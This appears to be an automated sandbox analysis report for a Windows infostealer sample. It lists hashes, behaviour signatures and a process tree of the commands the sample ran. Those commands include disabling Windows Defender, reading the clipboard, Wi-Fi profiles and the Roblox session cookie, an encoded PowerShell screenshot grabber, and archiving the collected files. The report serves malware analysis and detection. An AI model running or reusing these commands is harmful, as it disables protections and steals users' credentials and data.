Analysis

  • max time kernel
    6s
  • max time network
    11s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-10-2024 21:27

General

  • Target

    2ab620cda8ec28e775673d93c0e25db26d5c042fba24b8bde160ad963bd18dda.exe

  • Size

    5.9MB

  • MD5

    b3ba5d84c400a142171cbf1ad29b9cbd

  • SHA1

    7220c2fa5bc3a688e8d28e29c2f0ef5743514286

  • SHA256

    2ab620cda8ec28e775673d93c0e25db26d5c042fba24b8bde160ad963bd18dda

  • SHA512

    4ae0a0e5e98bfd3a557bc3d12c526609073f73e2d0391b95cb18b89b2e39479f359ecec0ea552c75e03d94e2d9129b22bc46096176e6b38644001202fef50b35

  • SSDEEP

    98304:z7De7pzWqX8MMhJMjarCtaCObO/OH9KkqQz4W1kgeDVFMZu3/MQt:z+NzWvB6yA+KO0WR4iZTQt

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 2 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 41 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 52 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2ab620cda8ec28e775673d93c0e25db26d5c042fba24b8bde160ad963bd18dda.exe
    "C:\Users\Admin\AppData\Local\Temp\2ab620cda8ec28e775673d93c0e25db26d5c042fba24b8bde160ad963bd18dda.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4324
    • C:\Users\Admin\AppData\Local\Temp\2ab620cda8ec28e775673d93c0e25db26d5c042fba24b8bde160ad963bd18dda.exe
      "C:\Users\Admin\AppData\Local\Temp\2ab620cda8ec28e775673d93c0e25db26d5c042fba24b8bde160ad963bd18dda.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2328
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2ab620cda8ec28e775673d93c0e25db26d5c042fba24b8bde160ad963bd18dda.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3836
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2ab620cda8ec28e775673d93c0e25db26d5c042fba24b8bde160ad963bd18dda.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1720
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1912
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4308
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1060
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1608
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2776
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:408
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4052
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4280
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2144
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:436
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:728
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3556
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:4372
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:2500
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:3384
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1824
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:1776
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4396
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:3772
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:652
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2760
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0om21h2i\0om21h2i.cmdline"
                5⤵
                  PID:5040
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB10.tmp" "c:\Users\Admin\AppData\Local\Temp\0om21h2i\CSC8CDA5AC5286D45EBB8AB9180A3C287AA.TMP"
                    6⤵
                      PID:4340
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4196
                • C:\Windows\system32\attrib.exe
                  attrib -r C:\Windows\System32\drivers\etc\hosts
                  4⤵
                  • Views/modifies file attributes
                  PID:3020
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4936
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4376
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                    PID:3908
                    • C:\Windows\system32\attrib.exe
                      attrib +r C:\Windows\System32\drivers\etc\hosts
                      4⤵
                      • Drops file in Drivers directory
                      • Views/modifies file attributes
                      PID:5008
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:2228
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:2608
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                        3⤵
                          PID:4924
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:952
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          3⤵
                            PID:4220
                            • C:\Windows\system32\tasklist.exe
                              tasklist /FO LIST
                              4⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4196
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:1888
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:2876
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:2396
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:2128
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:220
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:4568
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:1784
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2440
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "getmac"
                                          3⤵
                                            PID:3628
                                            • C:\Windows\system32\getmac.exe
                                              getmac
                                              4⤵
                                                PID:5108
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43242\rar.exe a -r -hp"remie" "C:\Users\Admin\AppData\Local\Temp\eoWE0.zip" *"
                                              3⤵
                                                PID:916
                                                • C:\Users\Admin\AppData\Local\Temp\_MEI43242\rar.exe
                                                  C:\Users\Admin\AppData\Local\Temp\_MEI43242\rar.exe a -r -hp"remie" "C:\Users\Admin\AppData\Local\Temp\eoWE0.zip" *
                                                  4⤵
                                                    PID:1204
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                  3⤵
                                                    PID:4912
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic os get Caption
                                                      4⤵
                                                        PID:1496
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                      3⤵
                                                        PID:2168
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic computersystem get totalphysicalmemory
                                                          4⤵
                                                            PID:1600
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                          3⤵
                                                            PID:4560
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic csproduct get uuid
                                                              4⤵
                                                                PID:4280
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                              3⤵
                                                                PID:4296
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                  4⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  PID:1604
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                3⤵
                                                                  PID:3652
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic path win32_VideoController get name
                                                                    4⤵
                                                                    • Detects videocard installed
                                                                    PID:2804
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                  3⤵
                                                                    PID:4128
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                      4⤵
                                                                        PID:3104

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                  Filesize

                                                                  3KB

                                                                  MD5

                                                                  8740e7db6a0d290c198447b1f16d5281

                                                                  SHA1

                                                                  ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                                  SHA256

                                                                  f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                                  SHA512

                                                                  d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  64B

                                                                  MD5

